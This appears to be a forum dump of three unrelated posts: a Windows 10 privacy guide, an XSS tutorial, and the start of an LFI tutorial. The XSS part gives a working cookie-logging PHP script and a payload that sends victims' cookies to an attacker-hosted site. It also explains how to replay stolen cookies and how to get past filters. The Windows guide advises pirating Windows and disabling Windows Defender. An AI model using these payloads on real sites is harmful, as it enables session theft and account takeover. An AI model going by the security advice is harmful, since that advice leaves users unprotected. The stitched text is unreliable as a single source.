Secure Yourself On Window 10

Secure Yourself On Windows 10

So I made this guide about trying to bring back privacy for Windows 10. Hope you like it.

---

Introduction

---

Some parts in this guide can be done by the many programs that people have already created to automate this process, however you could use this as a check list as you are installing Windows 10 or if you wish to do each step manually and not have it done by a program. Also I would agree some steps in this guide are a little anal and take things to far but I tried to go as deep as I could

Yes I know the first step to privacy with Windows is never to install it and use Linux or no computer at all, but some of us need it for work related tasks or development. So here is my guide that should increase privacy on Windows 10...
 

---

Basic - These are standard/ basic options and settings to complete. This is for people who kind of care but not really about privacy.

---

First thing I would go and do is make sure to download and install Windows 10 Enterprise just so you can turn of telemetry completely and have control over Windows updates. You will have to torrent this or buy it if you have the money. Once you have your Windows ISO  ready for install do the following:

Basic

• Do not choose express settings in the installation process. Click custom and turn everything off or to your liking.
• Use a local account and never use a Microsoft account to login with Windows 10. Same if you are on Windows 8/8.1
• After the install is done go to PC Settings > Privacy and disable everything unless you need some settings on. I would turn all that crap off
• While in the privacy settings page remember to turn off any Feedback...
• Turn off sharing updates, go to PC Settings > Update and Security > Advanced Options > Choose how updates are delivered and check the PCs on my local network and then switch it off.
• Disable Cortana.
• Disable web search by going to the search bar and clicking settings icon and choose never to include web results.
• Change the name of your computer by going to PC Settings > System > About and PC name should be at the top with a button saying rename PC. Change it to something random.
• Install the Classic Shell Start Menu to replace the horrible mess the start menu in Windows 10 is loaded with like Cortana, web search and metro apps. You can get this from: http://www.classicshell.net/

 

---

Advanced - For the more privacy concerned individuals out there.

---

Advanced

• Open the command prompt as administrator, and enter the following which will disable two Windows 10 data collection services

Code

sc delete DiagTrack
sc delete dmwappushservice
echo "" > C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger\AutoLogger-Diagtrack-Listener.etl

• Disable telemetry in Windows 10 Enterprise: Click start and search for and run as administrator gpedit.msc go to Computer Configuration > Administrative Templates > Windows Components > Data Collection and Preview Builds. Double click Telemetry, hit Disabled, then apply. This method does only work on Enterprise versions of Windows 10, if you have Home or PRO please look below under the extras tab.
• Instead of performing the following manually I recommend using a program called O&O ShutUp10 which you can find here: http://www.oo-software.com/en/shutup10

Here is an example of some of the features this program offers, I would say it is one of the best out there to use to disable things like OneDrive, feedback, peer to peer updates and so on. I will also include some other programs in the extras tab below which are open source and may be useful to others.

 

• I also recommend running a program called Anti-Beacon from Safer-Networking; the creators of Spybot. Spybot Anti-Beacon is a standalone tool which was designed to block and stop the various tracking (telemetry) issues present in Windows 10. Anti-Beacon is small, simple to use, and is provided free of charge. It was created to address the privacy concerns of users of Windows 10 who do not wish to have information about their PC usage sent to Microsoft. Simply clicking �Immunize� on the main screen of Anti-Beacon will immediately disable any known tracking features included by Microsoft in the operating system. You can find this program here: https://www.safer-networking.org/spybot-anti-beacon/
• Next, to completely make sure OneDrive won't bother you ever again, open up gpedit.msc while running it as admin, go to  Computer Configuration > Administrative Templates > Windows Components > OneDrive, double click Prevent the usage of OneDrive for file storage, hit Enabled, then apply.
• While still in the Group Policy Editor, go through Computer Configuration > Administrative Templates > Windows Components > Windows Defender, double click Turn Off Windows Defender, hit Enabled, then apply. Then either use no antivirus or install a third party one, really you only need an antivirus if you are a complete noob and are downloading untrusted content. Use a sandboxie or virtual machine... Antivirus programs use CPU time and memory as well. I am using Common Sense 2015 currently.
• Next to further more disable Windows telemetry go to regedit as admin go through HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection, select AllowTelemetry, change its value to 0, then apply.
• I then recommend running another Windows 10 Ati Spy program which you can find here https://github.com/Nummer/Destroy-Windows-10-Spying This enables you to disable certain services, add firewall rules and uninstall those horrible Metro Apps.
• IMPORTANT: Windows 10 has a new DNS feature called multi-homed named resolution, which gets around making only DNS request directly through your VPN tunnel. This works by Windows 10 sending multiple DNS requests through all available network interfaces, it does this to try and "improve" web performance; which is does but it completely makes your VPN/ Proxy pointless as you will then be leaking DNS requests through your normal ISP IP/ connection and not the VPN IP/ connection. Then Windows 10 will use the fastest DNS response which may not be your VPN every time. Please look in the extras tab for more information about this.

Fix for The Above Problem
Windows 10 Enterprise/ Server Only: To fix the Windows 10 DNS problem goto gpedit.exe and disable Smart Multi-Homed Name Resolution under Administrative Templates → Network → DNS Client → Turn off smart multi-homed name resolution.

Windows 10 Home Users: The only solution at the moment is to set predefined DNS servers in your network interface under Control Panel -> Network and Sharing Center -> Change adapter settings -> right click your internet connection -> Properties. Disable IPv6 and change the IPv4 settings to use a custom DNS server. I recommend using your VPN DNS server IP and then an open source DNS server for the alternative one, or a DNS server your trust won't log you or track you.
 

• I then would recommend you change your hosts file to block some of the Microsoft and ad IPs that are used by them, however Microsoft have said that their host names will ignore the hosts file and bypass it. But this does not mean every host name of theirs, if you wish to add this extra layer please add these host names in your Windows host file: (Please refer to PeerBlock if you want to block Microsoft IPs at the outgoing network level in the extras tab below.)

0.0.0.0 vortex.data.microsoft.com
0.0.0.0 vortex-win.data.microsoft.com
0.0.0.0 telecommand.telemetry.microsoft.com
0.0.0.0 telecommand.telemetry.microsoft.com.nsatc.net
0.0.0.0 oca.telemetry.microsoft.com
0.0.0.0 oca.telemetry.microsoft.com.nsatc.net
0.0.0.0 sqm.telemetry.microsoft.com
0.0.0.0 sqm.telemetry.microsoft.com.nsatc.net
0.0.0.0 watson.telemetry.microsoft.com
0.0.0.0 watson.telemetry.microsoft.com.nsatc.net
0.0.0.0 redir.metaservices.microsoft.com
0.0.0.0 choice.microsoft.com
0.0.0.0 choice.microsoft.com.nsatc.net
0.0.0.0 df.telemetry.microsoft.com
0.0.0.0 reports.wes.df.telemetry.microsoft.com
0.0.0.0 wes.df.telemetry.microsoft.com
0.0.0.0 services.wes.df.telemetry.microsoft.com
0.0.0.0 sqm.df.telemetry.microsoft.com
0.0.0.0 telemetry.microsoft.com
0.0.0.0 watson.ppe.telemetry.microsoft.com
0.0.0.0 telemetry.appex.bing.net
0.0.0.0 telemetry.urs.microsoft.com
0.0.0.0 urs.microsoft.com
0.0.0.0 bing.com
0.0.0.0 telemetry.appex.bing.net:443
0.0.0.0 settings-sandbox.data.microsoft.com
0.0.0.0 vortex-sandbox.data.microsoft.com
0.0.0.0 survey.watson.microsoft.com
0.0.0.0 watson.live.com
0.0.0.0 watson.microsoft.com
0.0.0.0 statsfe2.ws.microsoft.com
0.0.0.0 corpext.msitadfs.glbdns2.microsoft.com
0.0.0.0 compatexchange.cloudapp.net
0.0.0.0 cs1.wpc.v0cdn.net
0.0.0.0 a-0001.a-msedge.net
0.0.0.0 statsfe2.update.microsoft.com.akadns.net
0.0.0.0 sls.update.microsoft.com.akadns.net
0.0.0.0 fe2.update.microsoft.com.akadns.net
0.0.0.0 diagnostics.support.microsoft.com
0.0.0.0 corp.sts.microsoft.com
0.0.0.0 statsfe1.ws.microsoft.com
0.0.0.0 pre.footprintpredict.com
0.0.0.0 i1.services.social.microsoft.com
0.0.0.0 i1.services.social.microsoft.com.nsatc.net
0.0.0.0 feedback.windows.com
0.0.0.0 feedback.microsoft-hohm.com
0.0.0.0 feedback.search.microsoft.com
0.0.0.0 public-family.api.account.microsoft.com
0.0.0.0 adnxs.com
0.0.0.0 c.msn.com
0.0.0.0 g.msn.com
0.0.0.0 h1.msn.com
0.0.0.0 msedge.net
0.0.0.0 rad.msn.com
0.0.0.0 ads.msn.com
0.0.0.0 adnexus.net
0.0.0.0 ac3.msn.com
0.0.0.0 c.atdmt.com
0.0.0.0 m.adnxs.com
0.0.0.0 sO.2mdn.net
0.0.0.0 ads1.msn.com
0.0.0.0 ec.atdmt.com
0.0.0.0 flex.msn.com
0.0.0.0 rad.live.com
0.0.0.0 ui.skype.com
0.0.0.0 msftncsi.com
0.0.0.0 a-msedge.net
0.0.0.0 a.rad.msn.com
0.0.0.0 b.rad.msn.com
0.0.0.0 cdn.atdmt.com
0.0.0.0 m.hotmail.com
0.0.0.0 ads1.msads.net
0.0.0.0 a.ads1.msn.com
0.0.0.0 a.ads2.msn.com
0.0.0.0 apps.skype.com
0.0.0.0 b.ads1.msn.com
0.0.0.0 view.atdmt.com
0.0.0.0 preview.msn.com
0.0.0.0 aidps.atdmt.com
0.0.0.0 static.2mdn.net
0.0.0.0 a.ads2.msads.net
0.0.0.0 b.ads2.msads.net
0.0.0.0 db3aqu.atdmt.com
0.0.0.0 secure.adnxs.com
0.0.0.0 www.msftncsi.com
0.0.0.0 live.rads.msn.com
0.0.0.0 bs.serving-sys.com
0.0.0.0 pricelist.skype.com
0.0.0.0 a-0002.a-msedge.net
0.0.0.0 a-0003.a-msedge.net
0.0.0.0 a-0004.a-msedge.net
0.0.0.0 a-0005.a-msedge.net
0.0.0.0 a-0006.a-msedge.net
0.0.0.0 a-0007.a-msedge.net
0.0.0.0 a-0008.a-msedge.net
0.0.0.0 a-0009.a-msedge.net
0.0.0.0 aka-cdn-ns.adtech.de
0.0.0.0 cds26.ams9.msecn.net
0.0.0.0 lb1.www.ms.akadns.net
0.0.0.0 az361816.vo.msecnd.net
0.0.0.0 az512334.vo.msecnd.net
0.0.0.0 msntest.serving-sys.com
0.0.0.0 secure.flashtalking.com
0.0.0.0 s.gateway.messenger.live.com
0.0.0.0 schemas.microsoft.akadns.net
0.0.0.0 settings-win.data.microsoft.com
0.0.0.0 msnbot-65-55-108-23.search.msn.com
0.0.0.0 vortex-bn2.metron.live.com.nsatc.net
0.0.0.0 vortex-cy2.metron.live.com.nsatc.net
0.0.0.0 www.vortex.data.microsoft.com
0.0.0.0 www.vortex-win.data.microsoft.com
0.0.0.0 www.telecommand.telemetry.microsoft.com
0.0.0.0 www.telecommand.telemetry.microsoft.com.nsatc.net
0.0.0.0 www.oca.telemetry.microsoft.com
0.0.0.0 www.oca.telemetry.microsoft.com.nsatc.net
0.0.0.0 www.sqm.telemetry.microsoft.com
0.0.0.0 www.sqm.telemetry.microsoft.com.nsatc.net
0.0.0.0 www.watson.telemetry.microsoft.com
0.0.0.0 www.watson.telemetry.microsoft.com.nsatc.net
0.0.0.0 www.redir.metaservices.microsoft.com
0.0.0.0 www.choice.microsoft.com
0.0.0.0 www.choice.microsoft.com.nsatc.net
0.0.0.0 www.df.telemetry.microsoft.com
0.0.0.0 www.reports.wes.df.telemetry.microsoft.com
0.0.0.0 www.wes.df.telemetry.microsoft.com
0.0.0.0 www.services.wes.df.telemetry.microsoft.com
0.0.0.0 www.sqm.df.telemetry.microsoft.com
0.0.0.0 www.telemetry.microsoft.com
0.0.0.0 www.watson.ppe.telemetry.microsoft.com
0.0.0.0 www.telemetry.appex.bing.net
0.0.0.0 www.telemetry.urs.microsoft.com
0.0.0.0 www.urs.microsoft.com
0.0.0.0 www.bing.com
0.0.0.0 www.telemetry.appex.bing.net:443
0.0.0.0 www.settings-sandbox.data.microsoft.com
0.0.0.0 www.vortex-sandbox.data.microsoft.com
0.0.0.0 www.survey.watson.microsoft.com
0.0.0.0 www.watson.live.com
0.0.0.0 www.watson.microsoft.com
0.0.0.0 www.statsfe2.ws.microsoft.com
0.0.0.0 www.corpext.msitadfs.glbdns2.microsoft.com
0.0.0.0 www.compatexchange.cloudapp.net
0.0.0.0 www.cs1.wpc.v0cdn.net
0.0.0.0 www.a-0001.a-msedge.net
0.0.0.0 www.statsfe2.update.microsoft.com.akadns.net
0.0.0.0 www.sls.update.microsoft.com.akadns.net
0.0.0.0 www.fe2.update.microsoft.com.akadns.net
0.0.0.0 www.diagnostics.support.microsoft.com
0.0.0.0 www.corp.sts.microsoft.com
0.0.0.0 www.statsfe1.ws.microsoft.com
0.0.0.0 www.pre.footprintpredict.com
0.0.0.0 www.i1.services.social.microsoft.com
0.0.0.0 www.i1.services.social.microsoft.com.nsatc.net
0.0.0.0 www.feedback.windows.com
0.0.0.0 www.feedback.microsoft-hohm.com
0.0.0.0 www.feedback.search.microsoft.com
0.0.0.0 www.public-family.api.account.microsoft.com
0.0.0.0 www.adnxs.com
0.0.0.0 www.c.msn.com
0.0.0.0 www.g.msn.com
0.0.0.0 www.h1.msn.com
0.0.0.0 www.msedge.net
0.0.0.0 www.rad.msn.com
0.0.0.0 www.ads.msn.com
0.0.0.0 www.adnexus.net
0.0.0.0 www.ac3.msn.com
0.0.0.0 www.c.atdmt.com
0.0.0.0 www.m.adnxs.com
0.0.0.0 www.sO.2mdn.net
0.0.0.0 www.ads1.msn.com
0.0.0.0 www.ads2.msn.com
0.0.0.0 www.ec.atdmt.com
0.0.0.0 www.flex.msn.com
0.0.0.0 www.rad.live.com
0.0.0.0 www.ui.skype.com
0.0.0.0 www.msftncsi.com
0.0.0.0 www.a-msedge.net
0.0.0.0 www.a.rad.msn.com
0.0.0.0 www.b.rad.msn.com
0.0.0.0 www.cdn.atdmt.com
0.0.0.0 www.m.hotmail.com
0.0.0.0 www.ads1.msads.net
0.0.0.0 www.a.ads1.msn.com
0.0.0.0 www.a.ads2.msn.com
0.0.0.0 www.apps.skype.com
0.0.0.0 www.b.ads1.msn.com
0.0.0.0 www.view.atdmt.com
0.0.0.0 www.preview.msn.com
0.0.0.0 www.aidps.atdmt.com
0.0.0.0 www.static.2mdn.net
0.0.0.0 www.a.ads2.msads.net
0.0.0.0 www.b.ads2.msads.net
0.0.0.0 www.db3aqu.atdmt.com
0.0.0.0 www.secure.adnxs.com
0.0.0.0 www.www.msftncsi.com
0.0.0.0 www.live.rads.msn.com
0.0.0.0 www.bs.serving-sys.com
0.0.0.0 www.pricelist.skype.com
0.0.0.0 www.a-0001.a-msedge.net
0.0.0.0 www.a-0002.a-msedge.net
0.0.0.0 www.a-0003.a-msedge.net
0.0.0.0 www.a-0004.a-msedge.net
0.0.0.0 www.a-0005.a-msedge.net
0.0.0.0 www.a-0006.a-msedge.net
0.0.0.0 www.a-0007.a-msedge.net
0.0.0.0 www.a-0008.a-msedge.net
0.0.0.0 www.a-0009.a-msedge.net
0.0.0.0 www.aka-cdn-ns.adtech.de
0.0.0.0 www.cds26.ams9.msecn.net
0.0.0.0 www.lb1.www.ms.akadns.net
0.0.0.0 www.az361816.vo.msecnd.net
0.0.0.0 www.az512334.vo.msecnd.net
0.0.0.0 www.msntest.serving-sys.com
0.0.0.0 www.secure.flashtalking.com
0.0.0.0 www.s.gateway.messenger.live.com
0.0.0.0 www.schemas.microsoft.akadns.net
0.0.0.0 www.settings-win.data.microsoft.com
0.0.0.0 www.msnbot-65-55-108-23.search.msn.com
0.0.0.0 www.vortex-bn2.metron.live.com.nsatc.net
0.0.0.0 www.vortex-cy2.metron.live.com.nsatc.net

---

Miscellaneous - Additional things to consider when using Windows 10.

---

• Install PeerBlock (Link in extras tab below) and add the Microsoft IP Blok List from https://www.iblocklist.com/lists then run this program 24/7.
• Change your Mac Address from time to time.
• Never use Microsoft Edge/ Internet Explorer. Use an open source browser or FireFox... Chromium..
• Use VLC instead of Windows Media Player.
• Encrypt your storage drive(s) with VeraCrypt, however VeraCrypt does not support GPT partitions at this time and has not got full support for UEFI yet, you can get VeraCrypt from here: https://veracrypt.codeplex.com/
• Do NOT use Windows BitLocker ever, it is closed source and who knows what backdoor they have.
• Use a VPN or Proxy. Make sure you read there terms and conditions and making sure they have a no log policy.
• When installing any program check the settings and see if you agree with any privacy settings or change them to your needs. Look for things like send program use information, turn that off for example...
• Use Linux for any sensitive tasks and only use Windows operating systems if you need it.

---

Extras - Additional links, reads and articles if you wish to explore.

---

Disable telemetry in Windows 10 in Home and Pro
- http://winaero.com/blog/how-to-disable-telemetry-and-data-collection-in-windows-10/

Open Source Windows 10 Privacy Programs
- https://github.com/Nummer/Destroy-Windows-10-Spying
- https://github.com/10se1ucgo/DisableWinTracking
- https://github.com/W4RH4WK/Debloat-Windows-10

Windows 10 VPN Users at Big Risk of DNS Leaks
- https://www.bestvpn.com/blog/28318/warning-windows-10-vpn-users-at-big-risk-of-dns-leaks-2/
- http://www.qwealthreport.com/windows-10-users-beware-of-this-new-security-risk/

Peer Block
- http://www.peerblock.com/

Extra Reads and Information
- http://thenextweb.com/microsoft/2015/07/29/wind-nos/#gref
- http://www.theguardian.com/technology/askjack/2015/aug/15/windows-10-microsoft-should-privacy-problems-worry-me
- http://www.digitaltrends.com/computing/windows-10-privacy/
- http://lifehacker.com/what-windows-10s-privacy-nightmare-settings-actually-1722267229
- https://www.youtube.com/watch?v=r8_kXzTjU0k
- https://www.youtube.com/watch?v=goy0jBquW10
- https://fix10.isleaked.com/
- http://thehackernews.com/2015/08/secure-install-windows-10.html

Some Goodies
- https://i.imgflip.com/ou470.jpg
- https://i.imgflip.com/ou4lq.jpg
- https://i.imgflip.com/ou470.jpg
- https://i.imgflip.com/owi6h.jpg
- http://i1-news.softpedia-static.com/images/news2/this-windows-10-joke-just-won-the-internet-491641-3.jpg
- http://memecrunch.com/meme/8U4EU/windows-10-is-free-right/image.gif?w=400&c=1
 

---

Conclusion

---

Thank you for reading. Please respect people who favor their privacy, if you don't agree I ask you to please leave and don't flame at people with standards towards their own privacy online.

I do hope that Linux kicks off more in the future and more support for better programs and games are produced with open source software in mind, as really that is the only way we can know for sure if we are safe.

I may add to this list and update it every now and then or if there is anything you can think of to add please feel free to post in this thread with suggestions. Sorry for any grammar or spelling, I did not have time to proof read all of this, please let me know if anything is wrong. Furthermore if you need help with any of the above feel free to ask away. I am happy to help. 

SPECIAL THANK TO:
Thankyou Kathedu for explaining some stuff to me..

BYE!

XSS Tutorial

Introduction
This handbook was originally written by Taku.

What is XSS?
XSS, also known as cross-site scripting is a web vulnerability. It's caused when the user input
is not sanitized correctly, and is therefore executed.

Let's say there's a search box on a website. If you search for the word "cat" and press enter you'll
probably come to a second page where it says something like "500 results for the word 'cat'".
This means that the websites HTML is looking something like this.

Quote

<h1>500 results for the word 'cat'.</h1>

Now, let's say this website was vulnerable to XSS and you changed your input from cat to HTML code, it's
not sanitized correctly and is executed. Let's say you search for this instead: <script>alert('XSS')</script>.

Now the HTML code would look like this instead.

Quote

<h1>500 results for the word '<script>alert('XSS')</script>'</h1>

What the website will do is it will think that the user input is actually a part of the website, and it'll execute the Javascript code resulting in a
popup saying "XSS".

There's been a number of interesting uses of XSS over the years. One of the most recognized uses
was by a guy called Samy Kamkar. He successfully executed Javascript on his MySpace profile.
What he did was creating a Javascript worm, so as fast as anyone would visit Samy's MySpace profile, the
Javascript payload would run, adding the Payload to their own profile and change their bio to "But most of all, Samy is my hero".

In fact, I read just a while ago on the forum that the chatbox on Alphas.sx was vulnerable to XSS.
Luckily, for us the attacker - was a skid. He didn't put a dangerous payload on it. He could of done a lot worse stuff than he actually did,
like stealing cookies of users or making them; just like Samy did, changing their profiles.

XSS can be very harmful if it's used correctly.

Different attack methods
In XSS there's a number of different attack methods. I'll go over some of the most common ones with you.

- Non-Persistent XSS
This is the most common one of all XSS attack methods.
It's the vulnerabilties that are not stored on the website, but is parsed in for example a URL.
This include website searches and is usually found in forms that are never stored, the same thing I explained before.

For someone to exploit the vulnerable on an another user, he'd have to craft a link and send it to the target.
Let's imagine the search XSS I talked about earlier. The URL might look something like this:

Quote

http://www.website.com/search.php?q=search+here

The search+here would be replaced with the XSS payload.

- Persistent XSS
This one is actually the rarest type of XSS. This is found in comments, bio's, chat logs, etc - the ones where the text is stored on the website unless it's removed
by someone like an administrator.
The XSS found on the forum was persistent, as fast as anyone would visit the chatbox the payload would be executed.

- DOM-Based XSS
This attack method is basically useless. There's no way you can attack a user this way unless you trick them to enter your Javascript payload
in the vulnerable form/URL.
This vulnerability is similar to Non-Persistent XSS, but there's no URL crafted, so there's no way for you to make the victim
run the payload. The DOM-based XSS results in you just modifying the DOM enviornment in the victims browser.

Cookie Catching
Cookies are small files which are stored on a user's computer. They are usually seen as strings and are ran in the users browser.
This allows the server of a website to deliver a page tailored to a particular user.
For example, if you were to log into Facebook and make sure the "Remember me" button is checked a unique cookie file is stored on your computer.
Next time you visit Facebook, it's going to look for the cookie - and if you have it, it's automatically going to log you in.
If you can steal these cookies with, let's say a XSS vulnerability in Facebook, you can use those cookies in your own session to authorize as someone else. (Which the skid in the chatbox could of done, but didn't)

To start stealing cookies you have to set up your own websites with a PHP script.
I prefer using http://3owl.com or http://000webhost.com/. Once you've created an account you can log in and go to your file manager.
Here you're going to create a file, name it whatever you want - I'll go with cookie.php.

The file is going to contain this PHP code:

Quote

<?php

$cookie = $HTTP_GET_VARS[" c"];
$file = fopen('cookielog.txt', 'w');
fwrite($file, $cookie . "\n\n");
echo " <script>location.href='http://www.google.com';</script>";

?>

Once you've created it you'll have your URL with the PHP script on. It'll look something like this:

Quote

http://www.website.3owl.com/cookie.php

Now, go to the vulnerable website and enter this XSS payload:

Quote

<script>document.location= "http://www.website.3owl..com/cookie.php?c=" + document.cookie; </script>

What this will do is to redirect the site to your cookie logging script, and add the cookie after the "c=", and store the string in a textfile called cookielog.txt.
You can later go to your file manager and see if you've got any cookies.

To use someone's cookie you can use any cookie editor, like Advanced Cookie Manage which you can install as an addon through your browser.

Bypass Techniques
Most admins will put different filters trying to avoid XSS. Some of these methods are:

- magic_quotes_gpc=ON
- HEX encoding
- Obfuscation

magic_quotes_gpc=ON bypass
This is a very well known filter, and is also used to prevent SQLi and other vulnerabilities.
What it does is after every single quote (') and double quote (") it's escaped with a backslash.

The way you bypass this is by using the Javascript function String.fromCharCode().

Just convert your payload into decimals by using a tool like this http://www.asciizeichen.de/tabelle.html

HEX encoding bypass
This kind of explains itself, you simply encode your XSS payload into HEX.
For example, the XSS payload:
<script>alert(1)</script> would look like this %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

You can use websites like http://www.swingnote.com/tools/texttohex.php for this.

Obfuscation
This filter is the worst filter against XSS if it's not used correctly, and there's an extremely easy way of bypassing it.
What this filter does is it has different words like "script" and "alert" on a blacklist of words, so whenever someone tries to write them they're censored.
If the administrator is stupid you can easily bypass this by writing the payload like this:

Quote

<sCrIpT>aLerT(1)</sCriPt>

EXTRA METHOD
Sometimes you have to be a bit creative with your payloads and have a look at the source code.
You might have to write your payloads like this:

Quote

"><script>alert(1);</script>

or

Quote

</p><script>alert(1);</script>

There's endless of possibilities to this method.

How to fix XSS vulnerabilities
Obviously because we're in the "Security" section we have to learn how to secure your website against XSS threats.
There's a number of ways to fix XSS vulnerabilities, but I'm going to name the most common one.

Let's imagine that there's a search box on your website that's vulnerable to XSS.
You go into the PHP code of the search box and have a closer look.

If it's storing the user input in a variable like 'search' you have to add a secure function to it, to make it sanitized.
Let's imagine the result page's PHP code is:

Quote

<?php
echo ($_GET['search']);
?>

Instead of having it posting the user-input directly, we have to sanitize it first.
We can do this by changing the PHP code to

Quote

<?php
echo htmlspecialchars($_GET['search']);
?>

When you search for something It's going to show the same way, but the user-input is now sanitized and not taken literally.

XSS defense as a user
A good defense against XSS as a user is by using addons like noscript. What this addon does it not allowing
Javascript to be run on a website unless you allow it. So if someone sends you a link with a Javascript payload on
it wont execute unless you allow it to and it's trusted.

Last words
Taku has written this handbook with many efforts. Show him some love :)

Bye!

Local File Inclusion (LFI) Tut

Local File Inclusion (LFI)

---

In this tutorial

1.0 What is LFI?
1.1 Understanding LFI
1.2 Finding LFI vulnerabilities
1.3 Exploiting LFI vulnerabilities
    - Normal method
    - Log poisoning
    - The /proc/self/environ method
    - PHP filter method(s)
1.4 Securing LFI vulnerabilities


1.0 What is LFI?

Okay, lets go.

LFI stands for Local File Inclusion. LFI is a type of web-application security vulnerability. LFI is only one of many web-application security vulnerabilities. Web-applications is applications(in other words: pages/websites) you can view and interact with in your web browser.

In this tutorial I am going to show you LFI on PHP pages. PHP is a web script engine. Its the most widely used one, its the best one and its the one you are most likely to encounter in real life scenarios. Now, you might think;
But if I only learn this on one type of script, don't I have to learn all of this for all other types of scripts?(ASP, ASP.NET, Java, Perl, CGI, [...])

No, you don't. The concept remains the same. However, to truly understand LFI in various script types, I encourage you and recommend you from the bottom of my heart to learn the languages. You don't have to learn them all, but perhaps the top 3 most used or something like that. At least PHP.

Learn more about PHP: http://php.net | http://en.wikipedia.org/wiki/PHP
To lean PHP, start here and use the links in this topic: http://archive.evilzone.org/smf/web-oriented-programming/starting-php-scripting-setting-up-a-php-environment/


To understand how LFI vulnerabilities can occur we need to see the use of the include() and other include'ish functions in PHP. But even before that, we need to see how a web page is built up in general(HTML).
A normal website consists of HTML. The HTML consists of a HEAD section and a BODY section. We could go on with this forever and say that the HEAD and BODY consists of [...]. But we won't. We will just accept the fact that websites are built up of lots of parts. Lets take a closer look at website build-up.
 

(A rather normal looking website layout)

The image above is one of the most common website layouts ever. Lets break down its HTML layout:

Code

<html>
     <head>
          <title>A Common Website Layout</title>
     </head>
     <body>

          <div align="center" class="logo-area"></div>

          <div align="center" class="navigation-area">
                    <a href="index.php?page=home">Home</a> |
                    <a href="index.php?page=page1">Page1</a> |
                    <a href="index.php?page=page2">Page2</a>
          </div>

          <div align="center" class="main-content-area">
                     Content Content Content
          </div>

          <div align="center" class="navigation-or-copyright-area">
                    Copyright [url=http://www.Evilzone.org]www.Evilzone.org[/url] 2011
          </div>

     </body>
</html>

This is one of an endless amount of ways you could build this website layout with HTML. You can see that we got a HTML section(that contains everything else). We got a HEAD section and a BODY section. And inside those are various other section and parts. Now, ill be honest with you. This web page does not do a whole lot as it is right now. Actually, it does nothing. It will have a logo, a navigation, a main content area and a copyright at the bottom. The navigation will have three links(Home, Page1 and Page2). But none of the links will do anything other than sending you to the same page over and over again. Without changing the content. This type of page is referred to as a static HTML page. But thats rather boring, wouldn't you agree? Sure you do.

This is where the magic of web application scripts come in. Like previously said, I will be showing you guys LFI with PHP. To run a website with PHP pages, you will need PHP, obviously. And a web server that supports PHP. The most common combination is PHP with Apache web server. If you want to do testing on your own computer or set up a server, you can have a look at this topic: http://archive.evilzone.org/smf/web-oriented-programming/starting-php-scripting-setting-up-a-php-environment/

Okay, we now got ourself a web server that can run PHP pages(hypothetically). Lets rewrite the page above to take use of the GET arguments I placed in the navigation links. Now; WHAT THE FUCK IS GET ARGUMENTS!?!? Relax, we will get to that. Continue reading.

Before we go on, I want to get something of my heart. Because I know a lot of you guys will fuck up here. In the above example(the HTML code part) we are only looking at the HTML of the page. The HTML of any page can be viewed by right clicking the page in your browser and the go to 'view source' or something similar. This is not true for viewing PHP code in web pages. The only way to view the PHP code of a page is if you can read the file itself. Not from your browser. What you see in your browser is not the same thats inside your .php file. Continuing...

Lets look at how a typical PHP URL looks like: http://archive.evilzone.org/smf/index.php There, thats a typical PHP link. Now, very often there will be something like this after the php bit in the URL:".php?something=something&somethingelse=somethingelse". This is GET arguments. This particularly example got two GET arguments. I am sure you have figured it out by now. Non the less. Argument nr. 1 got the name "something" and its value is also "something". Argument nr. 2 got the name "somethingelse" and yes, you guessed it. Its value is also "somethingelse". Just to make things clear, the value and name does not have to be the same, this is just examples.

Additionally there is something called POST arguments and HTTP headers. However, I will not be covering those in this tutorial. Nor will I show you how to use these to exploit LFI vulnerabilities. Don't worry about it, as you learn more you will understand these to. Its not as hard as it sounds. I might even write tutorials for POST arguments and such later.

Now we can finally rewrite the page above with PHP code in it, to make different content for each of the links(Home, Page1 and Page2).

Code

<html>
     <head>
          <title>A Common Website Layout</title>
     </head>
     <body>

          <div align="center" class="logo-area"></div>

          <div align="center" class="navigation-area">
                    <a href="index.php?page=home">Home</a> |
                    <a href="index.php?page=page1">Page1</a> |
                    <a href="index.php?page=page2">Page2</a>
          </div>

          <div align="center" class="main-content-area">
<?php
// This is a PHP comment.
// PHP comments does not affect the PHP script
// Nor is PHP comments showed in the HTML code in the end. Actually, nothing of the stuff in between "<?php" and "<?" will be shown in the HTML source

// Lets first see if the GET argument we want to use is presentif (isset($_GET['page']))
{
     // The GET argument with name "page" is present. Lets look at its value:
     if ($_GET['page'] == "home")
     {
          // The GET argument's value is "home". Lets write out "home" to the HTML source
          echo("home");
     }
     elseif ($_GET['page'] == "page1")
     {
          // The GET argument's value is "page1". Lets write out "page1" to the HTML source
          echo("page1");
     }
     elseif ($_GET['page'] == "page2")
     {
          // The GET argument's value is "page2". Lets write out "page2" to the HTML source
          echo("page2");
     }
     else
     {
          // The GET argument's value is none of what we want, lets just give him the home page
          echo("home");
     }
}
else
{
          // The GET argument is not present in the URL. That means he is at the home page. Lets give him the home page.
          echo("home");
}
?>
          </div>

          <div align="center" class="navigation-or-copyright-area">
                    Copyright [url=http://www.Evilzone.org]www.Evilzone.org[/url] 2011
          </div>

     </body>
</html>

Gosh, that was a lot of code. Well, not really. But I can imagine it seams like tons for people who are not familiar with it. Lets break it down.
The first thing the PHP code will do is see weather or not the GET argument with the name "page" is present in the URL. If it is it will look further for the argument's value. If the value is "home", it will write out "home" to the HTML source. If the argument's value is "page1" it will write home "page1" to the HTML source. And so on. However, if the argument is not present in the URL, we should still give the guy browsing our page something. It just means he is at index.php without anything behind .php. So the script will just give him the equivalent value as if he was browsing the "home" page. If you still do not understand the code above, just read thought it a few times. Its all logic really, its even using logical words like IsSet(), if, else, else if etc.

Some of you might wonder where I am getting the values home, page1 and page2 from. If you look closely at the HTML source of our page you will see this:

Code

          <div align="center" class="navigation-area">
                    <a href="index.php?page=home">Home</a> |
                    <a href="index.php?page=page1">Page1</a> |
                    <a href="index.php?page=page2">Page2</a>
          </div>

This is our main navigation links. Home goes to http://oursite.com/index.php?page=home. Page1 goes to http://oursite.com/index.php?page=page1 and so on. This is where we are getting our values from. ("home", "page1", "page2")

Okay. This is all good right. We got a script which got three different contents depending on the link you click on the page. This is all good. But, the content is somewhat limit and boring. We could simply change the echo(""); lines to something much much larger. Full blown pages. However, that would be highly unpractical if you got 100 different links/pages in your page. If your average page is 250 characters, that would be at least 25000 characters in index.php. This is where the include() and other include'ish functions in PHP come in.

